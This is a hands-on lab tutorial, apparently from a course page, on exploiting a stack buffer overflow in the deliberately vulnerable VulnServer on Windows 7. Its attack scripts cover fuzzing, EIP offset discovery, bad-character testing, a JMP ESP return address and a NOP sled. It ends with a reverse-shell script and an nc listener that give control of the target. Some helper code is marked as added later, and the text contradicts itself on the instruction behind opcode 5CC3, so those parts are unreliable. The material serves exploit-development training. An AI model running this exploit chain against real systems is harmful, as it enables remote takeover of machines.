Exploiting - Vulnerable Server - For Windows 7
WARNING
VulnServer is unsafe to run. The Windows 7 machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your Windows machine.
Overview
This project guides you through all the steps of developing a Windows exploit, using a program that deliberately has a simple buffer overflow vulnerability.
http://sites.google.com/site/lupingreycorner/vulnserver.zip
A "vulnserver" window opens. Double-click vulnserver. The Vulnserver application opens, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 2 of 33
Turn off the firewall for both private and public networks.
nc 192.168.119.129 9999
You should see a banner saying "Welcome to Vulnerable Server!", as shown below.
Type HELP and press Enter. You see a lot of commands. None of these actually do anything useful, but they do take input and process it.
This server has many vulnerabilities, but the one we'll use now is in the TRUN command.
On your Kali Linux machine, in the Terminal window, type TRUN .AAA and press Enter.
On your Kali Linux machine, in the Terminal window, type EXIT and press Enter to close your connection to Vulnerable Server.
nano vs-fuzz1
In the nano window, type or paste this code. This is a simple Python script that does the same thing you just did--it connects to the server and executes a TRUN command with a specified number of "A" characters.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# This line was lost from the page's listing; the text expects you to enter the length at a prompt.
length = int(raw_input('Length of attack: '))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)                                   # the "Welcome to Vulnerable Server!" banner
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-fuzz1
Run the fuzzer again, but this time enter a length of 9000.
Try other lengths. You will find that it crashes for lengths of both 2000 and 3000. Each time it crashes, restart the server.
http://debugger.immunityinc.com/ID_register.py
Click the Download button. Save the file. The file is 22.7 MB in size.
When the download completes, double-click the ImmunityDebugger_1_85_setup file and install the software with the default options. It will also install Python.
Make your Windows desktop large, and drag the borders of the panes so you can see all four of them, as shown below.
Now we will attach a running process to Immunity. That will encapsulate the process inside Immunity, so Immunity can examine and control the process.
In the "Select process to attach" box, click vulnserver, as shown below, and click the Attach button.
To make the text more readable, position the mouse pointer somewhere in the top left pane and right-click.
In the context menu, click Appearance, "Font (all)", "OEM fixed font", as shown below.
In the lower left pane, right-click and click Hex, "Hex/ASCII (16 bytes)", as shown below.
Locate these items in your Immunity window, as marked in the image below.
Status in the lower right corner: this shows if the program is Paused or Running. When Immunity attaches a process, the process starts in the Paused state.
Current Instruction in the lower left: this shows exactly which instruction the process is executing right now. Immunity has automatically assigned a breakpoint at the start of the process and right now its execution has paused there.
Registers in the upper right: The most important items here are:
• EIP: the Extended Instruction Pointer is the address of the next instruction to be processed.
• ESP: the Extended Stack Pointer is the top of the stack
• EBP: the Extended Base Pointer is the bottom of the stack
Assembly Code in the upper left: This is the most difficult part of the window to understand. It shows the processor instructions one at a time in "Assembly Language", with instructions like MOV and CMP. Assembly language is difficult to learn, but you don't need to learn much of it to develop simple exploits. Don't struggle much with this pane at first.
Hex Dump at the lower left: this shows a region of memory in hexadecimal on the left and in ASCII on the right. For simple exploit development, we'll use this pane to look at targeted memory regions, usually easily labelled with ASCII text.
Stack in the lower right. This shows the contents of the Stack, but it's presented in a way that is not very helpful for us right now. For this project, disregard this pane.
If you are ready to learn more about these panes and their contents, see the "Debugging Fundamentals for Exploit Development" tutorial in the "Sources" section at the bottom of this project.
./vs-fuzz1
On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when writing to [41414141]", as shown below.
"41" is the hexadecimal code for the "A" character, as shown below.
This means that the 'A' characters you sent were somehow misinterpreted by the server as an address to write data to. Addresses are 32 bits long, which is 4 bytes, and 'A' is 41 in hexadecimal, so the address became 41414141.
This is a vulnerability that could be exploited, but it's not the sort of vulnerability to start with.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator".
Verify that the status in the lower right corner is "Running", as shown below.
./vs-fuzz1
On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when executing [41414141]", as shown below.
This is a classic buffer overflow exploit--the injected characters are placed into the EIP when a subroutine returns, so they become the address of the next instruction to be executed.
41414141 is not a valid address, so Immunity detects that the program is crashing and pauses so you can see what's happening.
This is common in exploit development--an attack of one length has different results than an attack of a different length.
From now on, we'll use a length of 3000 for all attacks.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-eip0
In the nano window, type or paste this code. This is a simple Python script that creates a pattern of four-byte sequences and prints it out so you can see it.
#!/usr/bin/python
# Build 500 four-byte fields: three digits (000 to 499) followed by 'A'.
chars = ''
for i in range(0x30, 0x35):
    for j in range(0x30, 0x3A):
        for k in range(0x30, 0x3A):
            chars += chr(i) + chr(j) + chr(k) + 'A'
print chars
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip0
As you can see, the pattern is simple--a three digit number followed by 'A'.
There are 500 groups of 4 characters, from 000A to 499A, for a total of 2000 bytes.
nano vs-eip1
This will send a 3000-byte attack to the server, consisting of 1000 'A' characters followed by the 2000-byte nonrepeating pattern.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# Attack layout (this part was lost from the page's listing):
# 1000 'A' characters followed by the 2000-byte pattern from vs-eip0.
prefix = 'A' * 1000
chars = ''
for i in range(0x30, 0x35):
    for j in range(0x30, 0x3A):
        for k in range(0x30, 0x3A):
            chars += chr(i) + chr(j) + chr(k) + 'A'
attack = prefix + chars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip1
The lower left corner of the Immunity window now says "Access violation when executing [35324131]", as shown below.
Hex Character
--- ---------
35 5
32 2
41 A
31 1
So the characters are '52A1'. However, Intel processors are "Little Endian", so addresses are inserted in reverse order, so the actual characters that were placed into the EIP were '1A25'.
That's this portion of the input string (with spaces added again, for clarity):
The pattern '1A25' occurs after 251 four-byte fields + 2 more bytes, or 251 x 4 + 2 = 1004 + 2 = 1006 bytes.
Our attack used 1000 'A' characters before the nonrepeating pattern, so the EIP contains the four bytes after the first 2006 bytes in the attack.
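To check this arithmetic without counting fields by hand, here is an added Python 3 example, written for this edit and not part of the original project. It rebuilds the same 2000-byte pattern as vs-eip0, turns the value Immunity displays in EIP (35324131 here) back into the bytes that were sent using the little-endian rule just described, and reports where those bytes sit in the attack string given the 1000-byte prefix. The same struct.pack call, used in the other direction, is how you later write a return address into the attack in byte-reversed order.

```python
import struct


def make_pattern():
    """Rebuild the vs-eip0 pattern: 000A, 001A, ..., 499A (500 fields, 2000 bytes)."""
    chars = ''
    for i in range(0x30, 0x35):
        for j in range(0x30, 0x3A):
            for k in range(0x30, 0x3A):
                chars += chr(i) + chr(j) + chr(k) + 'A'
    return chars.encode('ascii')


def eip_to_bytes(eip_hex):
    """Immunity prints EIP as one 32-bit number. On little-endian x86 the bytes
    that overwrote it sit in memory in reverse order, so 35324131 came from the
    bytes '1A25' (and 41414141 from 'AAAA')."""
    return struct.pack('<I', int(eip_hex, 16))


def address_to_attack_bytes(addr):
    """The other direction: the four bytes to place in the attack string so
    that an address such as 0x625011af ends up in EIP correctly."""
    return struct.pack('<I', addr)


def find_eip_offset(eip_hex, prefix_len):
    """Offset, in the full attack string, of the four bytes that landed in EIP,
    or None if the EIP value is not a piece of the pattern."""
    pos = make_pattern().find(eip_to_bytes(eip_hex))
    if pos < 0:
        return None
    return prefix_len + pos


if __name__ == '__main__':
    # Values from this project: a 1000-byte prefix of 'A's and EIP = 35324131.
    print(find_eip_offset('35324131', 1000))   # 2006
```

The pattern has no repeated four-byte window, so `find` locates the field unambiguously; a value that is not in the pattern (such as 41414141 from the all-'A' run) returns None instead of a misleading offset.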
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-eip2
This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, and enough 'F' characters to make the total 3000 bytes long.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# Attack layout (this part was lost from the page's listing):
# 2006 'A's, then 'BCDE' for EIP, then 'F' padding up to 3000 bytes.
prefix = 'A' * 2006
eip = 'BCDE'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip2
The lower left corner of the Immunity window now says "Access violation when executing [45444342]", as shown below.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.
Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text. That's going to be very important later--we'll put our exploit code here.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
Just from common sense, one might expect these characters to cause trouble:
Not all these characters are always bad, and there might be other bad characters too. So the next task is to try injecting them and see what happens.
nano vs-badchar1
This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, then all 256 possible characters, and finally enough 'F' characters to make the total 3000 bytes long.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# Attack layout (this part was lost from the page's listing):
# 2006 'A's, 'BCDE' for EIP, every byte value 00-FF, then 'F' padding to 3000 bytes.
prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0x00, 0x100):
    testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-badchar1
The lower left corner of the Immunity window says "Access violation when executing [45444342]" again.
To see if the characters we injected made it into the program or not, we need to examine memory starting at ESP.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.
Look in the lower left pane of Immunity. The first byte is 00, but none of the other characters made it into memory, not the other 255 bytes or the 'F' characters. That happened because the 00 byte terminated the string. '\x00' is a bad character.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-badchar2
This program skips the null byte, and includes all the other 255 bytes in the attack string, before the 'F' characters.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# Attack layout (this part was lost from the page's listing):
# same as vs-badchar1, but the test string starts at 01 so the null byte is left out.
prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0x01, 0x100):
    testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-badchar2
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.
All the bytes from 01 to FF appear in order, followed by 'F' characters (46 in hexadecimal).
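The comparison you just did by eye can be automated, which matters once a protocol mangles more than one byte. The following Python 3 example is added here and is not from the original project: it builds the test string the way vs-badchar1 and vs-badchar2 do, then walks it side by side with a dump of memory taken at ESP and reports which byte was altered, dropped, or cut the copy short. The dumps in the test are constructed to reproduce what the two runs showed (a null byte that terminated the string, then a clean run), plus hypothetical cases of a byte altered in place and a byte dropped; the dump is assumed to start exactly at the first test byte and to cover the whole test string.

```python
def badchar_test_string(known_bad=()):
    """Every byte value 0x00-0xff except the ones already known to be bad
    (vs-badchar1 skips none, vs-badchar2 skips 0x00)."""
    return bytes(b for b in range(256) if b not in known_bad)


def find_bad_chars(sent, observed):
    """Walk the bytes we sent and the bytes seen at ESP side by side.

    Returns (bad_bytes, truncated). A byte is reported as bad when it was
    altered in place or dropped. If nothing after some byte arrived at all,
    that byte terminated the copy (the 0x00 case in this project) and
    truncated is True.
    """
    bad = []
    i = j = 0                       # i indexes sent, j indexes observed
    while i < len(sent) and j < len(observed):
        if observed[j] == sent[i]:
            i += 1
            j += 1
            continue
        nxt = sent[i + 1] if i + 1 < len(sent) else None
        if nxt is None:
            bad.append(sent[i])     # last byte differs; nothing follows to compare against
            i += 1
            j += 1
        elif observed[j] == nxt:
            bad.append(sent[i])     # dropped: the following byte took its place
            i += 1
        elif j + 1 < len(observed) and observed[j + 1] == nxt:
            bad.append(sent[i])     # altered in place: the following byte is where expected
            i += 1
            j += 1
        else:
            break                   # nothing after this point matches: the copy stopped
    if i < len(sent):
        # The last byte that arrived intact is the one that ended the string.
        terminator = sent[i - 1] if i > 0 else sent[i]
        return bad + [terminator], True
    return bad, False


if __name__ == '__main__':
    # Constructed dump for the vs-badchar1 run: the 00 byte arrived, then only
    # whatever was in memory before (0xCC filler here), as the project describes.
    sent = badchar_test_string()
    dump = b'\x00' + b'\xcc' * 300
    print(find_bad_chars(sent, dump))          # ([0], True)
```

In practice you run this once per round: remove each reported byte from `known_bad`, resend, and dump again, because a byte that terminates the copy hides everything after it, exactly as the null byte did above.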
There are two simple instructions that will work: "JMP ESP" and the two-instruction sequence "PUSH ESP; RET".
To find these instructions, we need to examine the modules loaded when Vulnerable Server is running.
Installing MONA
MONA is a python module which gives Immunity the ability to list modules and search through them.
On your Windows machine, open Internet Explorer, and open this page:
http://redmine.corelan.be/projects/mona
In the "Download" section, right-click the "here" link below, and click "Save Target As". Save the file in your Downloads folder.
mona.7z
On the taskbar, click the yellow folder icon to open Windows Explorer. Navigate to your Downloads folder. Right-click mona and click Copy, as shown below.
A box pops up saying "You'll need to provide administrator permission...". Click Continue.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
Don't click the "Run" button yet--it's easier to use Mona with the program Paused.
!mona modules
Right-click an empty portion of the window and click Appearance, Font, "OEM Fixed Font", as shown below.
This chart shows all the modules loaded as part of Vulnerable Server, and several important properties for each one.
The property of most importance to us now is ASLR, which causes the address of the module to vary each time it is restarted.
Another property that can cause trouble is "Rebase", which relocates a module if another module is already loaded in its preferred memory location.
To make the most reliable exploit, we want to use a module without ASLR or Rebase.
There are two modules with "False" in both the Rebase and ASLR columns: essfunc.dll and vulnserver.exe.
However, notice the address values at the left of the chart--vulnserver.exe is loaded at very low address values, starting with 0x00, so any reference to addresses within vulnserver.exe will require a null byte, and that won't work because '\x00' is a bad character.
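The following Python 3 example, added here and not part of the original project, encodes the two rules just stated: skip any module with ASLR or Rebase set, and skip any module whose addresses would all need a bad byte. The module table is constructed to resemble the columns of "!mona modules" for this project; the base addresses and sizes are illustrative and not copied from the page, only the flags and the fact that vulnserver.exe sits at 0x00xxxxxx come from the text. It also checks a single candidate address byte by byte, which is the test you apply to whatever address the search turns up.

```python
BAD_CHARS = {0x00}   # the only bad character found by vs-badchar1 and vs-badchar2

# Constructed module table modelled on the "!mona modules" output.
# Base addresses and sizes are illustrative (assumption), not taken from the page.
MODULES = [
    {'name': 'vulnserver.exe', 'base': 0x00400000, 'size': 0x7000,   'rebase': False, 'aslr': False},
    {'name': 'essfunc.dll',    'base': 0x62500000, 'size': 0x8000,   'rebase': False, 'aslr': False},
    {'name': 'kernel32.dll',   'base': 0x76ad0000, 'size': 0xd4000,  'rebase': False, 'aslr': True},
    {'name': 'ntdll.dll',      'base': 0x77250000, 'size': 0x13c000, 'rebase': False, 'aslr': True},
]


def address_is_clean(addr, bad_chars=BAD_CHARS):
    """True if the four little-endian bytes of addr contain no bad character,
    i.e. the address can be written into the attack string as-is."""
    return not any(b in bad_chars for b in addr.to_bytes(4, 'little'))


def module_forces_bad_byte(module, bad_chars=BAD_CHARS):
    """True if every address inside the module has a bad most-significant byte.

    The low bytes of an address can be avoided by picking a different
    instruction inside the module; the top byte is shared by the whole
    module (or a 16 MB slice of it), so if all slices are bad the module is
    unusable, which is the vulnserver.exe case (0x00 top byte)."""
    first_top = module['base'] >> 24
    last_top = (module['base'] + module['size'] - 1) >> 24
    return all(top in bad_chars for top in range(first_top, last_top + 1))


def usable_modules(modules, bad_chars=BAD_CHARS):
    """Names of modules with neither ASLR nor Rebase that can be addressed cleanly."""
    return [m['name'] for m in modules
            if not m['aslr'] and not m['rebase']
            and not module_forces_bad_byte(m, bad_chars)]


if __name__ == '__main__':
    print(usable_modules(MODULES))              # ['essfunc.dll']
    print(address_is_clean(0x625011af))         # True
    print(address_is_clean(0x004012af))         # False: top byte is 0x00
```

Rebase and ASLR are excluded first because an address from such a module is only valid until the next restart or reboot; the byte check comes second because it only matters for a module you could otherwise rely on.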
locate nasm_shell
The utility is located in a metasploit-framework directory, as shown below.
Once nasm starts, type JMP ESP and press Enter to convert it to hexadecimal codes, as shown below.
The hexadecimal code for the two-instruction sequence "POP ESP; RET" is 5CC3.
If we can find either of those byte sequences in essfunc.dll, we can use them to run our exploit.
625011af
Now you should see the normal view, which is the "CPU window", as shown below.
Click the "Run" button. The Status at the lower right should say "Running", as shown below.
That will start executing code at the location ESP points to.
Just to test it, we'll put some NOP instructions there ('\x90' = No Operation -- they do nothing) followed by a '\xCC' INT 3 instruction, which will interrupt processing.
The NOP sled may seem unimportant, but it's needed to make room to unpack the Metasploit packed exploit code we'll make later.
nano vs-eip3
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
# Attack layout (this part was lost from the page's listing).
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'      # 625011af, the address found in essfunc.dll, in little-endian byte order
nopsled = '\x90' * 16         # NOPs; the count is not shown on the page, 16 matches vs-shell below
exploit = '\xcc'              # INT 3: the debugger stops here if we land on the sled
padding = 'F' * (3000 - 2006 - 4 - len(nopsled) - len(exploit))
attack = prefix + eip + nopsled + exploit + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip3
The lower left corner of the Immunity window now says "INT 3 command", as shown below.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.
The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte.
Don't bother to use the debugger now--if everything is working, the exploit will work on the real server.
nano vs-shell
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'      # 625011af in little-endian byte order
nopsled = '\x90' * 16
exploit = (
    ''   # PLACEHOLDER: paste the generated payload lines below this one (the page's listing was not captured)
)
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
s.send(('TRUN .' + attack + '\r\n'))   # the rest was cut off on the page; it sends the attack like the earlier scripts
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
ifconfig
Find your Kali machine's IP address and make a note of it.
On your Kali Linux machine, in a Terminal window, execute the command below.
Replace the IP address with the IP address of your Kali Linux machine.
The exploit is encoded to avoid null bytes, because '\x00' is a bad character.
Use the mouse to highlight the exploit code, as shown below. Right-click the highlighted code and click Copy.
nano vs-shell
Use the down-arrow key to move the cursor into the blank line below this line:
exploit = (
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
Starting a Listener
On your Kali Linux machine, open a new Terminal window and execute this command:
nc -nlvp 443
This starts a listener on port 443, to take control of the Windows target.
./vs-shell
In Kali Linux, the other Terminal window shows a Windows prompt, as shown below. You now control the Windows machine!
Sources
Debugging Fundamentals for Exploit Development
Introducing Vulnserver
MinHook - The Minimalistic x86/x64 API Hooking Library (Good JMP Examples)
Msfpayload